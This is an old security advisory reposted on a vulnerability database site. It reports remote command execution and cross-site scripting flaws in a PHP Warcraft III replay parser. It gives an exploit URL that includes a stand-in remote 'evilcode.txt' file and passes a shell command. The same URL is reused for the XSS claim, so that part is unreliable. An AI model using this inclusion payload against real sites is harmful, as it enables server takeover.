Computer Security

Security Advisory: Warcraft III Replay Parser Script Remote Command Exucetion Vulnerability And Cross-Site Scripting Attacking
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  SiteMan <= All version SQL injection in admin_login.asp

  linksubmit  <= All version Html Tag Injector in index.php

  FleXiBle Development Script Remote Command Exucetion And XSS Attacking

  DbbS<=2.0-alpha SQL injection

From:botan_(at)_linuxmail.org <botan_(at)_linuxmail.org>
Date:02.04.2006
Subject:Warcraft III Replay Parser Script Remote Command Exucetion Vulnerability And Cross-Site Scripting Attacking

Website : http://toya.net.pl/~julas/w3g/
Version : 1.8c

Description :

Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that Warcraft III replay files (*.w3g) have much information inside. Almost everything can be pulled out of them: players accounts, races, colours, heroes and units made by each player, chat log and many more. If you are a webmaster of Warcraft III replay site or clan page you know how boring adding new replays can be without automation. This PHP script helps you provide as much information about replays on your site as possible without all the hard work. *

I. Remote Command Exucetion ..

Yolumuz agitlerin yoludur.!

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

2.XSS Attacking

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

Solution : up version :)

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

14'ler Цlьmsьzdьr.
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server